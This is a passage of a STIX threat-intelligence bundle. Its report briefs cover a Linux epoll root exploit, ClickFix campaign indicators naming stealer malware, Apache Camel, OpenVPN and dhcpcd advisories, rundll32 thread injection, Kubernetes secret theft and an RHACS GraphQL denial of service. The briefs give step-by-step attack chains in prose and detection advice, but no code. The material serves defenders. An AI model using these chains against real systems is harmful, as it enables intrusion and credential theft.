      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4d27833-7995-5c85-a500-c399d9f02207",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--04408100-266d-52df-8708-543a2984cf4d",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--04408100-266d-52df-8708-543a2984cf4d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Proof-of-Concept Exploit Released for Linux 'Bad Epoll' Root Access Vulnerability (CVE-2026-46242)",
      "description": "## Overview\n\nA critical privilege escalation vulnerability, tracked as CVE-2026-46242 and dubbed 'Bad Epoll', affects Linux kernel versions 6.4 and newer, including distributions on desktops, servers, and Android phones like the Pixel 10. This flaw is a race-condition use-after-free bug within the `epoll` I/O event notification facility. A proof-of-concept (PoC) exploit, developed by Jaeyoung Chung of Seoul National University, has been publicly released, making the vulnerability significantly easier for attackers to leverage. The PoC demonstrates how an unprivileged process can exploit this bug to leak kernel memory, hijack the CPU's instruction pointer, and execute a Return-Oriented Programming (ROP) chain to gain full root privileges. The issue was introduced in 2023 and, despite an initial attempted fix, required a corrected patch two months after its discovery, highlighting its complexity. Organizations are urged to patch immediately due to the public availability of exploitation tools, which drastically increases the risk of in-the-wild attacks and unauthorized root access.\n\n## Attack Chain\n\n1.  An unprivileged process executes malicious code specifically crafted to exploit CVE-2026-46242.\n2.  The malicious code triggers a close-vs-close race condition within the Linux kernel's `epoll` facility's file-release path.\n3.  This race condition leads to a use-after-free vulnerability, where one part of the kernel frees an object while another continues to write to it.\n4.  The attacker leverages this use-after-free condition to achieve kernel memory leakage.\n5.  Using the leaked kernel memory, the attacker hijacks an indirect call to gain control over the CPU's instruction pointer register.\n6.  A carefully constructed Return-Oriented Programming (ROP) chain is executed using the controlled instruction pointer.\n7.  The ROP chain successfully elevates the privileges of the initially unprivileged process to root.\n\n## Impact\n\nSuccessful exploitation of the \"Bad Epoll\" vulnerability results in an unprivileged attacker gaining full root access to the compromised system. This includes Linux desktops, servers, and Android phones running affected kernel versions (6.4 or newer). Root privileges allow the attacker complete control over the operating system, enabling them to install persistent backdoors, exfiltrate sensitive data, modify system configurations, and execute arbitrary code with the highest level of permissions, leading to severe data breaches, system compromise, and potential widespread disruption.\n\n## Recommendation\n\n*   Prioritize patching CVE-2026-46242 on all affected Linux distributions and Android devices running kernel version 6.4 or newer immediately. Refer to your distribution's security advisories for specific patch availability.\n*   Regularly apply security updates to all Linux kernel versions, as demonstrated by the complexity and delayed fix of CVE-2026-46242.\n",
      "published": "2026-07-06T12:49:19Z",
      "labels": [
        "linux",
        "privilege-escalation",
        "vulnerability",
        "poc"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.securityweek.com/proof-of-concept-exploit-released-for-linux-bad-epoll-root-access-vulnerability/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--419a4060-5f4f-5d39-bded-99a13ff7da83",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "github_account_name: Xpos587",
      "pattern": "[x-ti-bot:github_account_name = 'Xpos587']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T12:44:38Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e60c86b1-08aa-512d-8f8f-0cc6d34713d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4b7a61bc-c34f-55fd-ace5-cd12de841e10",
      "target_ref": "indicator--419a4060-5f4f-5d39-bded-99a13ff7da83"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ce552f75-ee50-583b-889a-43d5be8cd96b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "packagist_namespace: sevenspan",
      "pattern": "[x-ti-bot:packagist_namespace = 'sevenspan']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T12:44:38Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--98590b61-d3e9-5464-b374-a0243ac0077c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4b7a61bc-c34f-55fd-ace5-cd12de841e10",
      "target_ref": "indicator--ce552f75-ee50-583b-889a-43d5be8cd96b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ff7bc575-4224-5e8d-b804-e0ba0de4602a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "malware_name: DEV#POPPER",
      "pattern": "[x-ti-bot:malware_name = 'DEV#POPPER']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T12:44:38Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d3c0ac2c-8df1-5435-b8b4-dc3fa3f2a521",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4b7a61bc-c34f-55fd-ace5-cd12de841e10",
      "target_ref": "indicator--ff7bc575-4224-5e8d-b804-e0ba0de4602a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--09114fe2-9b98-59e0-86da-bfe5a2b2e50b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "malware_name: OmniStealer",
      "pattern": "[x-ti-bot:malware_name = 'OmniStealer']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T12:44:38Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e83ca870-8af1-506b-bde1-910872ba0d6e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4b7a61bc-c34f-55fd-ace5-cd12de841e10",
      "target_ref": "indicator--09114fe2-9b98-59e0-86da-bfe5a2b2e50b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4b7a61bc-c34f-55fd-ace5-cd12de841e10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ClickFix Campaign Activity",
      "description": "## Overview\n\nThis brief tracks activity attributed to the ClickFix campaign. Sightings and\nindicators from separate reports are folded in as they are published, rather\nthan creating a separate brief per report.\n\n## Recommendation\n\nReview the collected indicators and references and hunt for ClickFix delivery\npatterns across endpoint and network telemetry.\n",
      "published": "2026-07-06T12:44:38Z",
      "labels": [
        "campaign",
        "clickfix"
      ],
      "object_refs": [
        "indicator--419a4060-5f4f-5d39-bded-99a13ff7da83",
        "indicator--ce552f75-ee50-583b-889a-43d5be8cd96b",
        "indicator--ff7bc575-4224-5e8d-b804-e0ba0de4602a",
        "indicator--09114fe2-9b98-59e0-86da-bfe5a2b2e50b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.securityweek.com/north-korean-hackers-target-open-source-developers-in-supply-chain-attacks/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eab4a832-df8e-5e7d-943d-0d585a186681",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0da488ff-b394-5d39-a3e6-f76f65a80622",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0da488ff-b394-5d39-a3e6-f76f65a80622",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Apache Camel Lead to Arbitrary Code Execution",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued a high-severity advisory (WID-SEC-2026-0445) concerning multiple unpatched vulnerabilities within the Apache Camel integration framework. While specific details of the vulnerabilities are not yet public, the advisory indicates that these flaws could allow an attacker to bypass existing security mechanisms and achieve arbitrary code execution on affected systems. Apache Camel is a widely adopted open-source framework used for integrating various enterprise applications and data sources, making its exploitation a significant concern for a broad range of organizations. The potential for arbitrary code execution underscores the critical risk posed by these vulnerabilities, emphasizing the urgent need for defenders to identify and update all Apache Camel installations to prevent potential system compromise and data breaches.\n\n## Impact\n\nSuccessful exploitation of these undisclosed vulnerabilities in Apache Camel would grant an attacker the ability to execute arbitrary code with the privileges of the affected application. This level of access typically leads to complete system compromise, enabling attackers to exfiltrate sensitive data, disrupt critical services, establish persistent footholds, or deploy additional malicious payloads like ransomware. Given Apache Camel's common use in backend integration and data processing, a compromise could have cascading effects across an organization's IT infrastructure, potentially affecting multiple linked systems and resulting in significant operational downtime, financial losses, and severe reputational damage.\n\n## Recommendation\n\n*   Immediately identify all instances of Apache Camel deployed within your environment, including version numbers.\n*   Monitor the official Apache Camel project security advisories and announcements for patch availability related to the vulnerabilities mentioned in this brief.\n*   Prioritize updating all identified Apache Camel installations to the latest secure version as soon as patches are released and tested for compatibility.\n",
      "published": "2026-07-06T11:21:26Z",
      "labels": [
        "vulnerability",
        "apache",
        "camel",
        "code-execution",
        "security-bypass"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0445"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Process Injection",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1055",
          "url": "https://attack.mitre.org/techniques/T1055"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9aaf0148-fa4d-5b3e-893c-9049c9f3d13a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4ec21477-68d5-5045-b42b-d36e3131e998",
      "target_ref": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4ec21477-68d5-5045-b42b-d36e3131e998",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Rundll32 Remote Thread Injection by Malware",
      "description": "## Overview\n\nThis threat brief focuses on the malicious use of `rundll32.exe` to perform remote thread injection, a sophisticated technique employed by various malware families, notably IcedID. This activity involves a legitimate `rundll32.exe` process creating a thread within another, often legitimate, process, allowing the attacker's code to execute discreetly within the target's memory space. This method significantly aids in defense evasion by blending malicious operations with normal system processes. Detection relies on monitoring Sysmon EventCode 8 logs, which specifically track `CreateRemoteThread` operations. If successfully exploited, this technique grants attackers the ability to execute arbitrary code, escalate privileges, maintain persistence, and ultimately exfiltrate sensitive data from compromised Windows endpoints, making it a critical concern for defenders.\n\n## Attack Chain\n\n1.  **Initial Compromise**: A malware payload, such as IcedID, is delivered and executed on a victim's Windows system (e.g., via phishing or exploit kit).\n2.  **Malware Execution**: The malware initiates `rundll32.exe`, often with specific parameters to load a malicious DLL.\n3.  **Process Target Identification**: `rundll32.exe`, under malware control, identifies a suitable target process (e.g., a common `*.exe` application like a web browser or system utility) for code injection.\n4.  **Remote Thread Creation**: `rundll32.exe` leverages the `CreateRemoteThread` API to create a new thread within the address space of the identified target process.\n5.  **Malicious Code Injection \u0026 Execution**: The newly created remote thread then executes malicious code or a loaded DLL payload within the context of the legitimate target process.\n6.  **Defense Evasion \u0026 Privilege Escalation**: By executing within a legitimate process, the malware evades detection by security tools and potentially inherits the privileges of the target process, facilitating further malicious activities.\n7.  **Command and Control / Data Exfiltration**: The injected code establishes command-and-control communication, performs data exfiltration, or initiates further stages of the attack, such as deploying ransomware or additional tools.\n\n## Impact\n\nThe observed impact of this technique includes significant operational disruption and data compromise. When `rundll32.exe` is used for remote thread injection, attackers gain the ability to execute arbitrary code with elevated privileges, bypassing many standard security controls. This can lead to complete system takeover, exfiltration of sensitive organizational data, deployment of ransomware (as seen with IcedID variants), and establishment of persistent access. The defense evasion capabilities of this technique make it particularly dangerous, allowing malware to operate unnoticed for extended periods, potentially affecting a broad range of systems across various industry sectors without specific targeting limitations.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Rundll32 Create Remote Thread to Other Process\" to your SIEM and tune for your environment.\n*   Ensure Sysmon is deployed on all Windows endpoints with Event ID 8 logging enabled for `CreateRemoteThread` events.\n*   Monitor `SourceImage` and `TargetImage` fields within Sysmon Event ID 8 logs for `rundll32.exe` performing remote thread creation.\n*   Investigate any instances of `rundll32.exe` initiating `CreateRemoteThread` events as this is a high-fidelity indicator of malicious activity.\n",
      "published": "2026-07-06T10:08:02Z",
      "labels": [
        "rundll32",
        "remote-thread-injection",
        "icedid",
        "defense-evasion",
        "code-injection",
        "windows",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/rundll32_create_remote_thread_to_a_process.yml"
        },
        {
          "source_name": "reference",
          "url": "https://www.joesandbox.com/analysis/380662/0/html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c8b8cf98-7453-5b4b-a29b-2893ede39106",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4205ed46-aa09-5254-b90b-68235df2e173",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4205ed46-aa09-5254-b90b-68235df2e173",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "dhcpcd Denial of Service Vulnerability",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued an advisory regarding a denial-of-service vulnerability affecting the dhcpcd DHCP client daemon. This vulnerability allows an attacker operating from an adjacent network segment to disrupt the normal operation of systems running dhcpcd. Specifically, the flaw could lead to a Denial of Service (DoS) attack, rendering affected Linux machines unable to obtain or renew IP addresses, thus losing network connectivity. This issue highlights the importance of securing network infrastructure components, even those seemingly low-level like DHCP clients, as their compromise can have cascading effects on critical systems. Defenders need to prioritize patching dhcpcd instances, especially on servers or critical workstations, and implement network segmentation to limit the blast radius of such adjacent-network attacks. The advisory, identified as WID-SEC-2026-2195, was published on July 6, 2026.\n\n## Attack Chain\n\n[The provided intelligence does not contain enough specific, technical details about the attack steps (e.g., specific packet types, exploit payloads, process names) to construct a detailed 6-8 step attack chain.]\n\n## Impact\n\nSuccessful exploitation of this dhcpcd vulnerability results in a Denial of Service, primarily affecting the network connectivity of the targeted Linux system. Machines relying on dhcpcd for IP address assignment would be unable to communicate on the network, effectively taking them offline. For critical servers, this could lead to significant downtime, loss of data access, and disruption of business operations. The attacker's proximity to the target on an adjacent network segment means that internal network segmentation is crucial for containing the impact and preventing such attacks from affecting critical infrastructure.\n\n## Recommendation\n\n*   Apply available patches or updates for the `dhcpcd` DHCP client daemon to address the Denial of Service vulnerability, as this directly remediates the identified flaw.\n*   Implement stringent network segmentation to isolate critical systems running `dhcpcd` from untrusted adjacent networks, thereby limiting the attack surface described in this brief.\n",
      "published": "2026-07-06T09:51:05Z",
      "labels": [
        "denial-of-service",
        "linux",
        "impact"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2195"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--764c84d5-9d1e-51e9-8dbe-8f9f06d4709e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0e13b168-0f9c-56a3-9510-687e4d4e7c06",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6454b496-33ef-55ed-8748-39a2db6dbef5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0e13b168-0f9c-56a3-9510-687e4d4e7c06",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e2ecd19f-526e-5651-b09b-ce2aa9d394a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0e13b168-0f9c-56a3-9510-687e4d4e7c06",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0e13b168-0f9c-56a3-9510-687e4d4e7c06",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenVPN: Multiple Vulnerabilities",
      "description": "## Overview\n\nCERT-Bund has issued an advisory detailing multiple critical vulnerabilities discovered in OpenVPN, a widely used open-source Virtual Private Network (VPN) solution. Published in July 2026, the advisory indicates that a local attacker can exploit these weaknesses to execute arbitrary code, modify system data, or instigate a denial-of-service condition. This poses a significant risk to organizations and individuals relying on OpenVPN for secure remote access and encrypted communication, as successful exploitation could lead to full system compromise from an already compromised local machine or user account, data integrity loss, or disruption of critical network services. Defenders should prioritize patching to mitigate these risks and ensure the continued integrity and availability of their VPN infrastructure.\n\n## Impact\n\nSuccessful exploitation of these OpenVPN vulnerabilities would allow a local attacker to escalate privileges, take control of the affected system, corrupt or exfiltrate sensitive data, or render the VPN server completely inoperable. For organizations, this could mean unauthorized access to internal networks, compromise of confidential information, and significant operational disruption due to VPN service outages. While specific victim counts or targeted sectors are not detailed in the advisory, OpenVPN's pervasive use across various industries means that unpatched instances could expose a wide range of entities to severe consequences.\n\n## Recommendation\n\n*   Prioritize patching all affected OpenVPN installations immediately to the latest secure versions available from OpenVPN Inc.\n*   Review network segmentation and access controls to limit the blast radius of any compromised local systems.\n*   Ensure that only authorized users and systems have local access to OpenVPN servers.\n*   Regularly monitor OpenVPN server logs for unusual activity, process crashes, or unexpected modifications to configuration files or system executables.\n",
      "published": "2026-07-06T09:50:19Z",
      "labels": [
        "vulnerability",
        "openvpn",
        "rce",
        "dos"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2197"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ef15b60e-f9c1-5296-a8a5-f96d8c1092e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e36bd94d-5fd3-591b-a8d3-824ab9084810",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e36bd94d-5fd3-591b-a8d3-824ab9084810",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Kubernetes Secret Access by Node or Pod Service Account",
      "description": "## Overview\n\nThis brief details a common post-exploitation technique where attackers, having successfully gained control of a Kubernetes node or compromised a pod, proceed to enumerate and extract sensitive information stored in Kubernetes Secret objects. This activity, detectable through Kubernetes audit logs, involves making `get` or `list` API calls against the `secrets` resource from credentials associated with a node (`system:node:*`) or a pod service account (`system:serviceaccount:*`). Such actions are highly suspicious, as legitimate kubelet and service account operations typically involve tightly scoped API usage and rarely require broad secret enumeration. Attackers leverage this behavior to sweep for critical credentials (e.g., API tokens, registry credentials, TLS certificates, application configurations) that can facilitate lateral movement, privilege escalation, or further data exfiltration within the cluster or connected environments. Even failed attempts to access secrets are indicative of attacker intent and should be investigated.\n\n## Attack Chain\n\n1.  **Initial Compromise**: Attacker gains unauthorized access to a Kubernetes pod or node, often via a vulnerable application, exposed administrative interface, or container escape.\n2.  **Credential Acquisition**: From the compromised context, the attacker obtains or utilizes the inherent `system:serviceaccount` token of the pod or `system:node` credentials of the node.\n3.  **Command Execution**: Using the acquired credentials, the attacker executes arbitrary commands or makes API requests from the compromised pod or node.\n4.  **Credential Access / Discovery**: The attacker issues `get` or `list` API calls against the Kubernetes `secrets` resource to identify available secrets.\n5.  **Data Exfiltration**: The attacker successfully retrieves the content of accessible secrets, including sensitive data like API tokens, private keys, database credentials, or image registry credentials.\n6.  **Impact**: The attacker leverages the exfiltrated secrets for lateral movement within the Kubernetes cluster, privilege escalation, access to external systems, or further data collection.\n\n## Impact\n\nSuccessful exploitation of this technique can lead to significant compromise of the Kubernetes cluster and its hosted applications. Attackers can steal critical API tokens, database credentials, TLS keys, and sensitive application configurations, enabling them to move laterally across namespaces, escalate privileges, access and modify application data, or deploy malicious workloads. This can result in data breaches, disruption of services, and unauthorized control over cloud resources. While no specific victim counts are provided, the technique is broadly applicable to any Kubernetes environment.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Kubernetes Secret Get or List from Node or Pod Service Account\" included in this brief to your SIEM and tune for your environment.\n*   Ensure comprehensive Kubernetes audit logging is enabled and ingested into your security monitoring platform to activate the rule above.\n*   Review the `User.Username` (or `kubernetes.audit.user.username`) field in logs when this rule triggers to identify the specific node or service account involved and investigate its Role-Based Access Control (RBAC) scope.\n*   Inspect `kubernetes.audit.objectRef.namespace`, `kubernetes.audit.objectRef.name`, `source.ip`, and `user_agent.original` fields for anomalous activity compared to known legitimate controllers.\n*   Baseline known service accounts, namespaces, or user agents that legitimately list or get Secrets, as noted in the `falsepositives` section of the Sigma rule, and create exclusions.\n*   If malicious activity is confirmed, immediately revoke the compromised token or node credentials, cordon or isolate the affected host or workload, rotate any exposed secrets, and tighten RBAC to enforce least privilege for all identities.\n",
      "published": "2026-07-06T09:44:31Z",
      "labels": [
        "kubernetes",
        "credential-access",
        "cloud-security",
        "container-security",
        "threat-detection"
      ],
      "object_refs": [
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/kubernetes/credential_access_kubernetes_secret_read_by_node_or_pod_service_account.toml"
        },
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1552/007/"
        },
        {
          "source_name": "reference",
          "url": "https://kubernetes.io/docs/reference/access-authn-authz/authentication/#service-account-tokens"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f596b9f7-6390-557b-8955-0a3e3f54c1bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c972b630-5bd1-5196-9e32-50d84677a951",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c972b630-5bd1-5196-9e32-50d84677a951",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-9165 - Red Hat Advanced Cluster Security for Kubernetes Central Component Denial of Service",
      "description": "## Overview\n\nA high-severity flaw, identified as CVE-2026-9165, has been discovered in Red Hat Advanced Cluster Security for Kubernetes (RHACS). Specifically, the vulnerability affects the Central component of RHACS, which serves as the management plane for cluster security. The issue stems from the authenticated GraphQL API's failure to limit the depth of incoming GraphQL queries. An attacker who has already obtained a valid API token for RHACS Central can exploit this by submitting excessively complex and deeply nested GraphQL queries. This malicious activity leads to uncontrolled resource consumption within the Central component, including CPU and memory. The consequence is a denial of service (DoS) for the entire RHACS management plane, preventing legitimate administrators from monitoring, configuring, or enforcing security policies across their Kubernetes clusters. This vulnerability highlights the importance of input validation and resource governance in API design, even for authenticated endpoints.\n\n## Attack Chain\n\n1.  **Initial Access (Prerequisite):** An attacker gains unauthorized access to a valid API token for the Red Hat Advanced Cluster Security for Kubernetes (RHACS) Central component, potentially through credential compromise or misconfiguration.\n2.  **API Identification:** The attacker identifies the authenticated GraphQL API endpoint exposed by the RHACS Central component.\n3.  **Query Crafting:** The attacker constructs a GraphQL query with an intentionally deep and complex nesting structure, designed to demand significant computational resources from the server.\n4.  **Authenticated Request:** The crafted, deeply nested GraphQL query is sent by the attacker to the RHACS Central authenticated GraphQL API, using the previously obtained valid API token.\n5.  **Uncontrolled Resource Consumption:** RHACS Central's GraphQL API processes the received query without enforcing limits on query depth or complexity, causing an exponential increase in its resource utilization (CPU, memory, network).\n6.  **System Degradation:** The Central component's performance rapidly deteriorates as it struggles to manage the overwhelming resource demands imposed by the malicious query.\n7.  **Denial of Service:** The RHACS Central management plane becomes unresponsive or crashes due to resource exhaustion, effectively preventing legitimate administrative access and rendering the security platform inoperable.\n8.  **Operational Impact:** Security operations are disrupted, leading to a loss of visibility, control, and enforcement capabilities for the targeted Kubernetes clusters, potentially creating a window for further attacks or compliance breaches.\n\n## Impact\n\nThe primary impact of CVE-2026-9165 is a denial of service (DoS) for the management plane of Red Hat Advanced Cluster Security for Kubernetes. This means that administrators would be unable to access, configure, or monitor their cluster security posture through the RHACS Central interface. Such an outage could lead to significant operational disruptions, potentially hindering the ability to respond to ongoing security incidents, apply necessary policy updates, or maintain compliance. While no specific victim counts or targeted sectors are provided, any organization utilizing vulnerable versions of RHACS could be affected, facing a critical loss of their security control plane.\n\n## Recommendation\n\n*   **Patch CVE-2026-9165:** Immediately apply the security updates provided by Red Hat to remediate CVE-2026-9165 on all affected Red Hat Advanced Cluster Security for 